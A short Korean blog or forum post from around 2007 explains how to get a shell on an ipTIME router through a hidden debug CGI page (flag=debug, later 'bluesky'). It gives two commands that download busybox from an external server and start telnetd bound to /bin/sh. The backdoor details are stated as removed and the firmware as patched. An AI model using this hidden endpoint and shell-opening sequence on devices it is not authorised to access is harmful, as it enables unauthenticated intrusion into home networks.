iptime 공유기의 셸 띄우기

iptime 공유기의 백도어 & 셸 띄우기

----------------------------------------------------------------------

2007-06-22 21:27:12에 백도어를 패치한 새 펌웨어가 나왔습니다.

http://iptime.co.kr/zeroboard/iptime_bbs/view.php?id=notice&no=347

----------------------------------------------------------------------

백도어에 대한 내용은 피해자를 유발할 수 있으므로 삭제했습니다.

디버그 모드에 관한 내용은 유용할 거 같아서 일단 놔둘 생각입니다. 이 기능은 계속 있었으면 좋겠네요.

http://공유기주소/cgi-bin/timepro.cgi?flag=debug를 입력하면 이상한 놈이 나옵니다.(최신버전은 debug 대신 bluesky입니다..)

리눅스 명령어를 실행할 수 있습니다.(약간 불편하네요)

여기서 http라는 wget와 비슷한 역할을 하는 프로그램을 찾아서 busybox를 올린 뒤(내장 busybox는 기능이 얼마 없더군요)

busybox에 들어있는 telnetd를 이용하여 putty로 접속했더니..

셸을 띄울 수 있었습니다.

/sbin/http get http://서버/busybox > /tmp/busybox &
/tmp/busybox telnetd -l /bin/sh 2> /tmp/log &

이렇게 입력하면 텔넷 데몬이 가동되어 접속할 수 있습니다(내부 네트웤에서만 가능합니다).

이런.. 글을 수정하니 메인으로 올라가네요.. 죄송합니다.